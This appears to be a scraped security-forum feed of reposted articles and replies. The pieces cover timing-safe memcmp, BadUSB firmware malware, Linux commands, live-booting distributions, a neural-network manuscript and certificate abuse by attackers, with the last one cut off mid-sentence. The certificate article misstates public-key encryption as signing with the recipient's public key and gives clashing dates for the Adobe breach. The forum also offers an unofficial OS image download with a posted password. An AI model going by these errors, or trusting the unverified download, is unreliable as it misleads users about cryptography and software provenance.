designs. If you ask a C developer to implement bytewise comparison, they’ll almost always choose memcmp(). (The “b” series of functions is more local to BSD and not Windows or POSIX platforms.) This means that developers using timingsafe_memcmp() will be incorporating unnecessary features simply by picking the familiar name. If compiler or CPU variation compromised this routine, this would introduce a vulnerability. John-Mark pointed out to me a few ways the current implementation could possibly fail due to compiler optimizations. While the bcmp routine is simpler (XOR accumulate loop), it too could possibly be invalidated by optimization such as vectorization. The most important concern is if this will encourage unsafe designs. I can’t come up with a crypto design that requires ordering of secret data that isn’t also a terrible idea. Sorting your AES keys? Why? Don’t do that. Database index lookups that reveal secret contents? Making array comparison constant-time fixes nothing when the index involves large blocks of RAM/disk read timing leaks. In any scenario that involves the need for ordering of secret data, much larger architectural issues need to be addressed than a comparison function. Simple timing-independent comparison is an important primitive, but it should be used only when other measures are not available. If you’re concerned about HMAC timing leaks, you could instead hash or double-HMAC the data and compare the results with a variable-timing comparison routine. This takes a tiny bit longer but ensures any leaks are useless to an attacker. Such algorithmic changes are much safer than trying to set compiler and CPU behavior in concrete. The justification I’ve heard from Ted Unangst is “API parity“. His argument is that developers will not use the timing-safe routines if they don’t conform to the ordering behavior of memcmp. I don’t get this argument. Developers are more likely to be annoyed with the sudden performance loss of switching to timing-safe routines, especially for comparing large blocks of data. And, there’s more behavior that should intentionally be broken in a “secure memory compare” routine, such as two zero-length arrays returning success instead of an error. Perhaps OpenBSD will reconsider offering this routine purely for the sake of API parity. There are too many drawbacks. Sursa: Timing-safe memcmp and API parity | root labs rdist
-
E dovedit: dispozitivele USB pot con?ine viru?i greu de detectat, cu acces nelimitat la datele utilizatorilor Aurelian Mihai - 1 aug 2014 Demonstrat? de un grup de exper?i în securitate, o bre?? de securitate prezent? în protocolul de comunica?ie folosit pentru conectarea dispozitivelor USB poate fi exploatat? cu consecin?e extrem de grave, compromi?ând orice computer cu port USB. Mai mult, dispozitivele USB infectate sunt greu de descoperit, utilizatorii de rând neputând afla dac? stick-ul USB flash sau tastatura proasp?t achizi?ionat? con?ine sau nu un virus periculos. Potrivit exper?ilor Karsten Nohl ?i Jakob Lell, protocolul Universal Serial Bus folosit ca standard pentru conectarea dispozitivelor externe la portul USB con?ine o bre?? de securitate ce poate fi exploatat? pentru a ob?ine control nelimitat asupra PC-urilor. Pentru a expune problema descoperit? cei doi au decompilat por?iunea de firmware responsabil cu gestionarea func?iilor de baz? ale protocolului USB, la care au ad?ugat o mostr? de malware creat cu scop demonstrativ. Odat? strecurat? pe dispozitivul USB, componenta malware prezent? la nivel de firmware este activat? prin simpla conectare a dispozitivului la portul USB, ob?inând acces la fi?ierele stocate în memorie sau intercepta conexiunea la internet a utilizatorului. zoom inE dovedit: dispozitivele USB pot con?ine viru?i imposibil de înl?turat, cu acces nelimitat la datele utilizatorilor Având în vedere c? acest exploit vizeaz? însu?i protocolul care guverneaz? func?ionarea dispozitivelor USB, practic orice dispozitiv poate fi compromis - stick-uri USB flash, mouse ?i tastaturi USB, smartphone ?i tablete cu port USB. Totu?i, componenta malware nu este executat? direct pe dispozitiv, ci mai degrab? transferat? în memoria PC-ului conectat, unde poate fi detectat? ?i înl?turat? folosind programe antivirus. Din p?cate dispozitivul infectat nu poate fi cur??at prin simpla ?tergere sau formatare a spa?iului de stocare. În lipsa unui patch care s? instaleze un firmware necompromis, dispozitivul USB va continua s? infecteze orice PC la care este conectat. Momentan este aproape imposibil pentru utilizatorii obi?nui?i s? verifice dac? firmware-ul unui dispozitiv este sau nu compromis. În plus, este teoretic posibil ca infectarea s? se produc? ?i în sens invers, de la un PC infectat la un dispozitiv USB, propagând mai departe malware-ul respectiv la orice PC este conectat dispozitivul proasp?t compromis. Aparent, exploit-ul despre care se zvone?te c? ar fi folosit deja de autorit??ile americane pentru înlesnirea activit??ilor de spionaj nu are în prezent nici un remediu. Singurele m?suri care pot fi luate de utilizatori este s? evite folosirea dispozitivelor USB cu provenien?? incert? ?i s? previn? propagarea infect?rilor evitând conectarea dispozitivelor USB la PC-uri deja compromise. Sursa: E dovedit: dispozitivele USB pot con?ine viru?i greu de detectat, cu acces nelimitat la datele utilizatorilor
-
Nu. Imaginea e ca sa poata vedea toata lumea ce aplicatii are si ce fac. Cei care se plictisesc pot decompila APK-urile si se pot uita prin sursa lor sa vada ce fac.
-
[h=1] Secure by Design[/h] [h=2]A 21st-century smartphone[/h] Blackphone combines a custom operating system with leading applications optimized for security. The result: an unparalleled product ideal for people who recognize a need for privacy and want a simple, secure place to start. [h=1]Meet PrivatOS[/h] [h=2]Blackphone’s security-enhanced Android™ build[/h] Blackphone’s combination of a custom operating system with hand picked application tools optimizes for security. The result: an unparalleled product ideal for information workers, executives, public figures, and anyone else unwilling to give up their privacy. View Features Info: https://www.blackphone.ch/ Download: https://rstforums.com/fisiere/blackphone-4.4.2.zip (243 MB)
-
Parola: 5ZTzuOIjaq
-
E posibil sa fie o "bula" de aer. Dar daca display-ul merge ok, nu vad care e problema. Daca l-ai cumparat deja, il poti incalzi putin cu un feon, apoi sa tii apasat si sa speri sa dispara. Si, de preferat, sa aplici presiune dispre interior spre margine, ca in cazul in care e aer acolo, sa poata iesi.
-
Poza e facuta cu 3310? Nu se vede. Da folia jos mai intai. Apoi baga USOR ceva acolo si vezi daca se misca.
-
51 Useful Lesser Known Commands for Linux Users By Avishek Kumar Under: Linux Commands On: December 24, 2013 Download Your Free eBooks NOW - 10 Free Linux eBooks for Administrators Linux command line is attractive and fascinating, and there exists a flock of Linux user who are addictive to command Line. Linux command line can be funny and amusing, if you don’t believe me, you can check one of our article below. 20 Funny Commands of Linux or Linux is Fun in Terminal 51 Lesser Known Commands for Linux As well as extremely powerful, at the same time. We brought to you, five articles on “Lesser Known Linux Commands” consisting of 50+ lesser known Linux command. This article aims at concatenating all those five articles as one, and lets you know, what is where, in brief. 11 Lesser Known Commands – Part I This article was highly appreciated by our readers, which contains simple yet very important commands. The article summaries as. 1. sudo!! : Forgot to run a command with sudo? You need not re-write the whole command, just type “sudo!!” and the last command will run with sudo. 2. Python -m SimpleHTTPServer : Creates a simple web page for the current working directory over port 8000. 3. mtr : A command which is a combination of ‘ping’ and ‘traceroute’ command. 4. Ctrl+x+e : This key combination fires up, an editor in the terminal, instantaneously. 5. nl : Outputs the content of text file with lines Numbered. 6. shuf : Randomly selects line/file/folder from a file/folder. 7. ss : Outputs Socket Statistics. 8. Last: Want to know history of last logged in users? This command comes to rescue here. 9. curl ifconfig.me : Shows machine’s external IP Address. 10. tree : Prints files and folders in tree like fashion, recursively. 11. Pstree : Prints running processes with child processes, recursively. 11 Lesser Known Useful Linux Commands – Part I The great response, received on this article, and requests to provide another list of ‘Lesser Known Linux Commands‘, from our readers, we wrote next article of the series is: 10 Lesser Known Commands – Part II This article again was warm welcomed. The summary of the article, below is enough to describe this. 12. <space> command : A space before a bash command, is not recorded in history. 13. stat : Shows the status information of a file as well as of a file system. 14. <alt>. And <esc>. : A tweak which put the last command argument at prompt, in the order of last entered command, appearing first. 15. Pv : outputs simulating text, similar to hollywood movies. 16. Mount | column -t : Lists mounted file system, in nice formatting with specification. 17. Ctrl + l: clear shell prompt, instantaneously. 18. curl -u gmail_id –silent “https://mail.google.com/mail/feed/atom” | perl -ne ‘print “\t” if //; print “$2\n” if /(.*)/;’. This simple scripts, opens up, unread mail of an user, in the terminal itself. 19. screen : Detach and Reattach, long running process from a session. 20. file : Outputs information, regarding types of file. 21. id : Print User and Group Id. 10 Lesser Known Linux Commands – Part 2 Getting over 600 Likes on different social Networking sites and many thankful comments, we were ready with our third article of the series is: 10 Lesser Known Commands – Part 3 This article summaries as below: 22. ^foo^bar : Run last command with modification, without the need of rewriting the whole command again. 23. > file.txt : Flush the content of a text file, in a single go, from the command prompt. 24. at : Run a particular command, time based. 25. du -h –max-depth=1 Command : Outputs the size of all the files and folders within current folder, in human readable format. 26. expr : Solve simple mathematical calculations from the terminal. 27. look: Check for an English word, from the dictionary, in case of confusion, right from the shell. 28. yes : continues to print a sting, till interrupt instruction is given. 29. factor: Gives all the possible factors of a decimal number. 30. ping -i 60 -a IP_address : Pings the provided IP_address, and gives audible sound when host comes alive. 31. tac : Prints content of a file, in reverse order. 10 Lesser Known Commands for Linux – Part 3 Our Hard-work was paid by the response we received and fourth article of the series was: 10 Lesser Known Linux Commands – Part IV Need not say, again this article was appreciated. The article summarises below: 32. strace : A debugging tool. 33. disown -a && exit Command : Run a command in background, even after terminal session is closed. 34. getconf LONG_BIT Command : Output Machine Architecture, very clearly. 35. while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done & : The script outputs date and time on the top right corner of shell/ terminal. 36. convert : converts the output of a command in picture, automatically. 37. watch -t -n1 “date +%T|figlet” : Show animated digital clock at the prompt. 38. host and dig : DNS lookup utility. 39. dstat : Generates statistics regarding system resource. 40. bind -p : Shows all the shortcuts available in Bash. 41. Touch /forcefsck : Force file-system check on next boot. 10 Lesser Known Effective Linux Commands – Part IV 10 Lesser Known Linux Commands- Part V The commands from here was getting biased towards scripts, yes single line powerful shell scripts and we thought to provide at least one more article on this series. 42. lsb_release : Prints distribution specification information. 43. nc -ZV localhost port_number : Check if a specific port is open or not. 44. curl ipinfo.io : Outputs Geographical Information, regarding an ip_address. 45. find .-user xyz : Lists all file owned by user ‘xyz’ 46. apt-get build-dep package_name: Build all the dependency, automatically while installing any specific package. 47. lsof -iTCP:80 -sTCP:LISTEN. The script, outputs all the service/process using port 80. 48. find -size +100M : This command combination, Lists all the files/folders the size of which is 100M or more. 49. pdftk : A nice way to concatenate a lot of pdf files, into one. 50. ps -LF -u user_name : Outputs Processes and Threads of a user. 51. Startx — :1 (This command creates another new X session). 10 Lesser Known Useful Linux Commands- Part V That’s all for now. Don’t forget to give us your valuable feedback in our comment section. This is not an end of lesser known Linux commands, and we will keep them bringing to you, from time to time, in our articles. I’ll be coming with another article, very interesting and useful for our readers. Till then stay tuned and connected to Tecmint.com. Sursa: 51 Useful Lesser Known Commands for Linux Users
-
Adventures in live booting Linux distributions July 29, 2014 By Major Hayden We’re all familiar with live booting Linux distributions. Almost every Linux distribution under the sun has a method for making live CD’s, writing live USB sticks, or booting live images over the network. The primary use case for some distributions is on a live medium (like KNOPPIX). However, I embarked on an adventure to look at live booting Linux for a different use case. Sure, many live environments are used for demonstrations or installations — temporary activities for a desktop or a laptop. My goal was to find a way to boot a large fleet of servers with live images. These would need to be long-running, stable, feature-rich, and highly configurable live environments. Finding off the shelf solutions wasn’t easy. Finding cross-platform off the shelf solutions for live booting servers was even harder. I worked on a solution with a coworker to create a cross-platform live image builder that we hope to open source soon. (I’d do it sooner but the code is horrific.) Debian jessie (testing) First off, we took a look at Debian’s Live Systems project. It consists of two main parts: something to build live environments, and something to help live environments boot well off the network. At the time of this writing, the live build process leaves a lot to be desired. There’s a peculiar tree of directories that are required to get started and the documentation isn’t terribly straightforward. Although there’s a bunch of documentation available, it’s difficult to follow and it seems to skip some critical details. (In all fairness, I’m an experienced Debian user but I haven’t gotten into the innards of Debian package/system development yet. My shortcomings there could be the cause of my problems.) The second half of the Live Systems project consist of multiple packages that help with the initial boot and configuration of a live instance. These tools work extremely well. Version 4 (currently in alpha) has tools for doing all kinds of system preparation very early in the boot process and it’s compatible with SysVinit or systemd. The live images boot up with a simple SquashFS (mounted read only) and they use AUFS to add on a writeable filesystem that stays in RAM. Reads and writes to the RAM-backed filesystem are extremely quick and you don’t run into a brick wall when the filesystem fills up (more on that later with Fedora). Ubuntu 14.04 Ubuntu uses casper which seems to precede Debian’s Live Systems project or it could be a fork (please correct me if I’m incorrect). Either way, it seemed a bit less mature than Debian’s project and left a lot to be desired. Fedora and CentOS Fedora 20 and CentOS 7 are very close in software versions and they use the same mechanisms to boot live images. They use dracut to create the initramfs and there are a set of dmsquash modules that handle the setup of the live image. The livenet module allows the live images to be pulled over the network during the early part of the boot process. Building the live images is a little tricky. You’ll find good documentation and tools for standard live bootable CD’s and USB sticks, but booting a server isn’t as straightforward. Dracut expects to find a squashfs which contains a filesystem image. When the live image boots, that filesystem image is connected to a loopback device and mounted read-only. A snapshot is made via device mapper that gives you a small overlay for adding data to the live image. This overlay comes with some caveats. Keeping tabs on how quickly the overlay is filling up can be tricky. Using tools like df is insufficient since device mapper snapshots are concerned with blocks. As you write 4k blocks in the overlay, you’ll begin to fill the snapshot, just as you would with an LVM snapshot. When the snapshot fills up and there are no blocks left, the filesystem in RAM becomes corrupt and unusable. There are some tricks to force it back online but I didn’t have much luck when I tried to recover. The only solution I could find was to hard reboot. Arch The ArchLinux live boot environments seem very similar to the ones I saw in Fedora and CentOS. All of them use dracut and systemd, so this makes sense. Arch once used a project called Larch to create live environments but it’s fallen out of support due to AUFS2 being removed (according to the wiki page). Although I didn’t build a live environment with Arch, I booted one of their live ISO’s and found their live environment to be much like Fedora and CentOS. There was a device mapper snapshot available as an overlay and once it’s full, you’re in trouble. OpenSUSE The path to live booting an OpenSUSE image seems quite different. The live squashfs is mounted read only onto /read-only. An ext3 filesystem is created in RAM and is mounted on /read-write. From there, overlayfs is used to lay the writeable filesystem on top of the read-only squashfs. You can still fill up the overlay filesystem and cause some temporary problems, but you can back out those errant files and still have a useable live environment. Here’s the problem: overlayfs was given the green light for consideration in the Linux kernel by Linus in 2013. It’s been proposed for several kernel releases and it didn’t make it into 3.16 (which will be released soon). OpenSUSE has wedged overlayfs into their kernel tree just as Debian and Ubuntu have wedged AUFS into theirs. Wrap-up Building highly customized live images isn’t easy and running them in production makes it more challenging. Once the upstream kernel has a stable, solid, stackable filesystem, it should be much easier to operate a live environment for extended periods. There has been a parade of stackable filesystems over the years (remember funion-fs?) but I’ve been told that overlayfs seems to be a solid contender. I’ll keep an eye out for those kernel patches to land upstream but I’m not going to hold my breath quite yet. Sursa: Adventures in live booting Linux distributions | major.io
-
[h=1]A Brief Introduction to Neural Networks[/h] [h=2]Manuscript Download - Zeta2 Version[/h] Filenames are subject to change. Thus, if you place links, please do so with this subpage as target. If you like the manuscript and want to buy me a coffee or beer, please click on the Flattr button on the right Thanks! [TABLE=class: inline] [TR=class: row0] [TH=class: col0 leftalign] [/TH] [TH=class: col1 centeralign] Original version [/TH] [TH=class: col2 centeralign] eBookReader optimized [/TH] [/TR] [TR=class: row1] [TH=class: col0] English [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 244 pages [/TD] [TD=class: col2 centeralign] PDF, 6.1MB, 286 pages [/TD] [/TR] [TR=class: row2] [TH=class: col0] German [/TH] [TD=class: col1 centeralign] PDF, 6.2MB, 256 pages [/TD] [TD=class: col2 centeralign] PDF, 6.2MB, 296 pages [/TD] [/TR] [/TABLE] [h=3]Original Version? EBookReader Version?[/h] The original version is the two-column layouted one you've been used to. The eBookReader optimized version on the other hand has one-column layout. In addition, headers, footers and marginal notes were removed. For print, the eBookReader version obviously is less attractive. It lacks nice layout and reading features and occupies a lot more pages. However, using electronic readers, the simpler lay-out significantly reduces the scrolling effort. During every release process from now on, the eBookReader version going to be automatically generated from the original content. However, contrary to the original version, it is not provided an additional manual layout and typography tuning cycle by the release workflow. So concerning the aestetics of the eBookReader optimized version, do not expect any support [h=2]Further Information for Readers[/h] [h=3]Provide Feedback![/h] This manuscript relies very much on your feedback to improve it. As you can see from the lots of helpers mentioned in my frontmatter, I really appreciate and make use of feedback I receive from readers. If you have any complaints, bug-fixes, suggestions, or acclamations send emails to me or place a comment in the newly-added discussion section below at the bottom of this page. Be sure you get a response. [h=3]How to Cite this Manuscript[/h] There's no official publisher, so you need to be careful with your citation. For now, use this: David Kriesel, 2007, A Brief Introduction to Neural Networks, available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel This reference is, of course, for the english version. Please look at the German translation of this page to find the German reference. Please always include the URL – it's the only unique identifier to the text (for now)! Note the lack of edition name, which changes with every new edition, and Google Scholar and Citeseer both have trouble with fast-changing editions. If you prefer BibTeX: @book{ Kriesel2007NeuralNetworks, author = { David Kriesel }, title = { A Brief Introduction to Neural Networks }, year = { 2007 }, note = { available at Informatik, Realsatire, Photos. Und Ameisen in einem Terrarium. · D. Kriesel } } Again, this reference is for the English version. [h=3]Terms of Use[/h] From the epsilon edition, the text is licensed under the Creative Commons Attribution-No Derivative Works 3.0 Unported License, except for some little portions of the work licensed under more liberal licenses as mentioned in the frontmatter or throughout the text. Note that this license does not extend to the source files used to produce the document. Those are still mine. [h=2]Roadmap[/h] To round off the manuscript, there is still some work to do. In general, I want to add the following aspects: Implementation and SNIPE: While I was editing the manuscript, I was also implementing SNIPE a high performance framework for using neural networks with JAVA. This has to be brought in-line with the manuscript: I'd like to place remarks (e.g. “This feature is implemented in method XXX in SNIPE”) all over the manuscript. Moreover, an extensive discussion chapter on the efficient implementation of neural networks will be added. Thus, SNIPE can serve as reference implementation for the manuscript, and vice versa. Evolving neural networks: I want to add a nice chapter on evolving neural networks (which is, for example, one of the focuses of SNIPE, too). Evolving means, just growing populations of neural networks in an evolutionary-inspired way, including topology and synaptic weights, which also works with recurrent neural networks. Hints for practice: In chapters 4 and 5, I'm still missing lots of practice hints (e.g. how to preprocess learning data, and other hints particularly concerning MLPs). Smaller issues: A short section about resilient propagation and some more algorithms would be great in chapter 5. The chapter about recurrent neural networks could be extended. Some references are still missing. A small chapter about echo state networks would be nice. I think, this is it … as you can see, there's still a bit of work to do until I call the manuscript “finished”. All in all, It will be less work than I already did. However, it will take several further releases until everything is included. [h=3]Recent News[/h] As of the manuscript's Epsilon version, update information is published in news articles whose headlines you find right below. Please click on any news title to get the information. 2012-03-17: EbookReader Versions of Neural Networks Manuscript 2011-10-21: New Release "A Brief Introduction to Neural Networks": Zeta version 2010-11-20: "A brief Introduction to Neural Networks": English version gets overwrought thoroughly! 2010-10-13: "A Brief Introduction to Neural Networks" published in Epsilon2 Version 2009-10-11: "A Brief Introduction to Neural Networks" published in Epsilon Version [h=2]What are Neural Networks, and what are the Manuscript Contents?[/h] Neural networks are a bio-inspired mechanism of data processing, that enables computers to learn technically similar to a brain and even generalize once solutions to enough problem instances are tought. The manuscript “A Brief Introduction to Neural Networks” is divided into several parts, that are again split to chapters. The contents of each chapter are summed up in the following. [h=3]Part I: From Biology to Formalization -- Motivation, Philosophy, History and Realization of Neural Models[/h] [h=4]Introduction, Motivation and History[/h] How to teach a computer? You can either write a rigid program – or you can enable the computer to learn on its own. Living beings don't have any programmer writing a program for developing their skills, which only has to be executed. They learn by themselves – without the initial experience of external knowledge – and thus can solve problems better than any computer today. KaWhat qualities are needed to achieve such a behavior for devices like computers? Can such cognition be adapted from biology? History, development, decline and resurgence of a wide approach to solve problems. [h=4]Biologische Neuronale Netze[/h] How do biological systems solve problems? How is a system of neurons working? How can we understand its functionality? What are different quantities of neurons able to do? Where in the nervous system are information processed? A short biological overview of the complexity of simple elements of neural information processing followed by some thoughts about their simplification in order to technically adapt them. [h=4]Components of Artificial Neural Networks[/h] Formal definitions and colloquial explanations of the components that realize the technical adaptations of biological neural networks. Initial descriptions of how to combine these components to a neural network. [h=4]How to Train a Neural Network?[/h] Approaches and thoughts of how to teach machines. Should neural networks be corrected? Should they only be encouraged? Or should they even learn without any help? Thoughts about what we want to change during the learning procedure and how we will change it, about the measurement of errors and when we have learned enough. [h=3]Part II: Supervised learning Network Paradigms[/h] [h=4]The Perceptron[/h] A classic among the neural networks. If we talk about a neural network, then in the majority of cases we speak about a percepton or a variation of it. Perceptrons are multi-layer networks without recurrence and with fixed input and output layers. Description of a perceptron, its limits and extensions that should avoid the limitations. Derivation of learning procedures and discussion about their problems. [h=4]Radial Basis Functions[/h] RBF networks approximate functions by stretching and compressing Gaussians and then summing them spatially shifted. Description of their functions and their learning process. Comparison with multi-layer perceptrons. [h=4]Recurrent Multi-layer Perceptrons[/h] Some thoughts about networks with internal states. Learning approaches using such networks, overview of their dynamics. [h=4]Hopfield Networks[/h] In a magnetic field, each particle applies a force to any other particle so that all particles adjust their movements in the energetically most favorable way. This natural mechanism is copied to adjust noisy inputs in order to match their real models. [h=4]Learning Vector Quantisation[/h] Learning vector quantization is a learning procedure with the aim to reproduce the vector training sets divided in predefined classes as good as possible by using a few representative vectors. If this has been managed, vectors which were unkown until then could easily be assigned to one of these classes. [h=3]Part III: Unsupervised learning Network Paradigms[/h] [h=4]Self Organizing Feature Maps[/h] A paradigm of unsupervised learning neural networks, which maps an input space by its fixed topology and thus independently looks for simililarities. Function, learning procedure, variations and neural gas. [h=4]Adaptive Resonance Theory[/h] An ART network in its original form shall classify binary input vectors, i.e. to assign them to a 1-out-of-n output. Simultaneously, the so far unclassified patterns shall be recognized and assigned to a new class. [h=3]Part IV: Excursi, Appendices and Registers[/h] [h=4]Cluster Analysis and Regional and Online Learnable Fields[/h] In Grimm's dictionary the extinct German word “Kluster” is described by “was dicht und dick zusammensitzet (a thick and dense group of sth.)”. In static cluster analysis, the formation of groups within point clouds is explored. Introduction of some procedures, comparison of their advantages and disadvantages. Discussion of an adaptive clustering method based on neural networks. A regional and online learnable field models from a point cloud, possibly with a lot of points, a comparatively small set of neurons being representative for the point cloud. [h=4]Neural Networks Used for Prediction[/h] Discussion of an application of neural networks: A look ahead into the future of time series. [h=4]Reinforcement Learning[/h] What if there were no training examples but it would nevertheless be possible to evaluate how good we have learned to solve a problem? et us regard a learning paradigm that is situated between supervised and unsupervised learning. Posted on 2009-05-01 by David Kriesel. Sursa: A Brief Introduction to Neural Networks · D. Kriesel
-
How Cybercrime Exploits Digital Certificates What is a digital certificate? The digital certificate is a critical component of a public key infrastructure. It is an electronic document that associates the individual identity of a person to the public key associated with it. A certificate can then be associated with a natural person, a private company or a web service as a portal. The certificate is issued by an organization, dubbed Certification Authority (or CA), recognized as “trusted” by the parties involved, and is used ordinarily for the operations of public key cryptography. The Certification Authority issues a digital certificate in response to a request only after it verifies the identity of the certificate applicant. The process of telematics verification of certificates can be done by anyone since the CA maintains a public register of digital certificates issued and a register related to revoke the ones (Certification Revocation List or CRL). Each digital certificate is associated with a time period of validity, so certificates may be revoked if expired. Other conditions that could cause the revocation of a digital certificate are the exposure of its private key, and any change of the relationship between the subject and its public key, for example the change of the mail address of the applicant. In the process of asymmetric cryptography, each subject is associated with a pair of keys, one public and one private. Any person may sign a document with its private key. Everyone with intent to verify the authenticity of the document can verify the document using the public key of the signer, which is exposed by the CA. Another interesting use linked to the availability of the public key of an entity is the sending of encrypted documents. Assuming you want to send an encrypted document to Pierluigi, it is sufficient that you sign them with his public key exposed by the CA. At this point, only Pierluigi with his private key, associated with the public key used for the encryption, can decrypt the document. The public key of each subject is contained in a digital certificate signed by a trusted third party. In this way, those who recognize the third party as trustworthy just have to verify its signature to accept as valid the public key it exposes. The most popular standard for digital certificates is the ITU-T X.509, according to which a CA issues a digital certificate that binds the public key of the subject to a Name Badge (Distinguished Name), or to an Alternative Name (Alternative Name) such as an email address or a DNS record. The structure of an X.509 digital certificate includes the following information: version serial number ID algorithm body emitter validity subject information on the public key of the subject signature algorithm of the certificate signature of certificate It is likely you’ll come across the extensions used for files containing X.509 certificates, the most common are: CER – Certified with DER encoded, sometimes sequences of certificates. DER – DER encoded certificate. PEM – Base64-encoded certificate to a file. PEM may contain certificates or private keys. P12 – PKCS # 12 certificates and may contain public and private keys (password protected). Another classification of digital certificates is the intended use. It is useful to distinguish authentication certificates and subscription certificates. A subscription Digital Certificate is used to define the correspondence between an individual applying for the certificate and its public key. These certificates are the ones used for the affixing of digital signatures that are legally valid. A Certificate of Authentication is mainly used for accessing web sites that implement authentication via certificate, or sign up for e-mail messages in order to ensure the identity of the sender. An authentication certificate is usually associated with an email address in a unique way. A digital certificate in the wrong hands Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, many of them had serious consequences. Comodo was the first organization to suffer a cyber attack. High managers at Comodo revealed that the registration authority had been compromised in a March 15th, 2011 attack and that the username and password of a Comodo Trusted Partner in Southern Europe were stolen. As consequence, a Registration Autorithy suffered an attack that resulted in a breach of one user account of that specific RA. Its account was then fraudulently used to issue nine digital certificates across seven different domains, including: login.yahoo.com (NSDQ:YHOO), mail. google.com (NSDQ:GOOG), login.skype.com, and addons.mozilla.org. All of these certificates were revoked immediately upon discovery. In August of the same year, another giant fell victim to a cyber attack: the Dutch Certification Authority DigiNotar, owned by VASCO Data Security International. On September 3rd, 2011, after it had become clear that a security breach had resulted in the fraudulent issuing of certificates, the Dutch government took over the operational management of DigiNotar’s systems. A few weeks later, the company was declared bankrupt. But the list of victims is long. KPN stopped issuing digital certificates after finding a collection of attack tools on its server likely used to compromise it. The company informed the media that there wasn’t evidence that its CA infrastructure was compromised, and that all the actions to respond the incident had been started as a precaution. Experts at KPN discovered the tools during a security audit: they found a server hosting a DDoS tool. The application may have been there for as long as four years. Unfortunately, the defeat is not finished, because in the same period, GemNET, a subsidiary of KPN (a leading telecommunications and ICT service provider in The Netherlands), suffered a data breach, and according to Webwereld, the hack was related to CA certificates. The list of victims is reported in the following table published by the expert Paolo Passeri on his blog hackmageddon.com. It includes also other giants like GlobalSign and DigiCert Malaysia. Figure – CA incidents occurred in 2011 (Hackmageddon.com) Why attack a Certification Authority? Cybercriminals and state-sponsored hackers are showing a great interest in the PKI environment, and in particular they are interested in abusing digital certificates to conduct illicit activities like cyber espionage, sabotage or malware diffusion. The principal malicious uses related to the digital certificates are: Improve malware diffusion Installation of certain types of software (e.g. application updates) its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, it reduces the possibility that a malware will be detected as quickly. Security experts have estimated that more than 200,000 unique malware binaries were discovered in the last couple of years signed with valid digital signatures. The most famous example is represented by the cyber weapon Stuxnet used to infect nuclear plants for the enrichment of uranium in Iran. The source code of the malware was signed using digital certificates associated to Realtek Semiconductor and JMicron Technology Corp, giving the appearance of legitimate software to the targeted systems. Stuxnet drivers were signed with certificates from JMicron Technology Corp and Realtek Semiconductor Corp, two companies that have offices in the Hsinchu Science and Industrial Park. Security experts at Kaspersky Lab hypothesized an insider job. It is also possible that the certificates were stolen using a dedicated Trojan such as Zeus, meaning there could be more. Figure – Digital certificate used to sign Stuxnet In September 2013, cyber criminals stole digital certificates associated with Adobe. According to security chief Brad Arkin, a group of hackers signed a malware using an Adobe digital certificate, compromising a vulnerable build server of the company. The hacked server was used to get code validation from the company’s code-signing system. “We have identified a compromised build server with access to the Adobe code signing infrastructure. We are proceeding with plans to revoke the certificate and publish updates for existing Adobe software signed using the impacted certificate … This only affects the Adobe software signed with the impacted certificate that runs on the Windows platform and three Adobe AIR applications* that run on both Windows and Macintosh. The revocation does not impact any other Adobe software for Macintosh or other platforms … Our forensic investigation is ongoing. To date we have identified malware on the build server and the likely mechanism used to first gain access to the build server. We also have forensic evidence linking the build server to the signing of the malicious utilities. We can confirm that the private key required for generating valid digital signatures was not extracted from the HSM,” reported the company advisory (written by Arkin). Figure – Adobe Breach Advisory The hackers signed with a valid and legitimate Adobe certificate at least a couple of malicious codes, a password dumper, and a malicious ISAPI filter. The two malicious programs were signed on July 26, 2012. In April 2014, security researchers at Comodo AV Labs detected a new variant of the popular Zeus Trojan, enhanced with a digital signature of its source code to avoid detection. This instance is digitally signed with a stolen digital certificate, which belongs to Microsoft Developer. Figure – Adobe Digital Certificate abused by cyber criminals Economic Frauds A digital signature gives a warranty on who signed a document and you can decide if you trust the person or company who signed the file and the organization who issued the certificate. If a digital certificate is stolen, victims will suffer an identity theft and related implications. Malware authors could design a specific malicious agent that could be spread to steal digital certificates. In the case of certificates associated with a web browser, it is possible to trick victims into thinking that a phishing site is legitimate. Cyber warfare Cyber espionage conducted by cyber criminals or state sponsored hackers are the activities most frequently carried out with stolen certificates. Digital certificates are used by attackers to conduct “man-in-the-middle” attacks over the secure connections, tricking users into thinking they were on a legitimate site when in fact their SSL/TLS traffic was being secretly tampered with and intercepted. One of the most blatant case was the DigiNotar one, when different companies like Facebook, Twitter, Skype, Google and also intelligence agencies like CIA, Mossad, and MI6 were targeted in the Dutch government certificate hack. In 2011, Fox-IT security firm discovered that the extent and duration of the breach were much more severe than had previously been disclosed. The attackers could have used the stolen certificates to spy on users of popular websites for weeks, without their being able to detect it. “It’s at least as bad as many of us thought … DigiNotar appears to have been totally owned for over a month without taking action, and they waited another month to take necessary steps to notify the public,” said Chester Wisniewski, a senior security advisor at Sophos Canada, in a blog post. Fox-IT was commissioned by Diginotar to conduct an audit, dubbed “Operation Black Tulip,” and discovered that the servers of the company were compromised. Another clamorous case was discovered in December 2013 by Google, which notices the use of digital certificates issued by an intermediate certificate authority linked to ANSSI for several Google domains. ANSSI is the French Cyber Security agency that operates with French intelligence agencies. The organization declares that an intermediate CA is generating fake certificates to conduct MITM attacks and inspect SSL traffic. Be aware that an intermediate CA certificate carries the full authority of the CA, and attackers can use it to create a certificate for any website they wish to hack. “ANSSI has found that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network.” Google discovered the ongoing MITM attack and blocked it. Google also declared that ANSSI has requested to block an intermediate CA certificate. Figure – Digital certificate warning “As a result of a human error which was made during a process aimed at strengthening the overall IT security of the French Ministry of Finance, digital certificates related to third-party domains which do not belong to the French administration have been signed by a certification authority of the DGTrésor (Treasury) which is attached to the IGC/A. “The mistake has had no consequences on the overall network security, either for the French administration or the general public. The aforementioned branch of the IGC/A has been revoked preventively. The reinforcement of the whole IGC/A process is currently under supervision to make sure no incident of this kind will ever happen again,” stated the ANSSI advisory. The ANSSI attributed the incident to “Human Error” made by someone at the Finance Ministry, sustaining that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network. Misusing Digital Certificates Digital certificates have been misused many times during recent years. Bad actors abused them to conduct cyber attacks against private 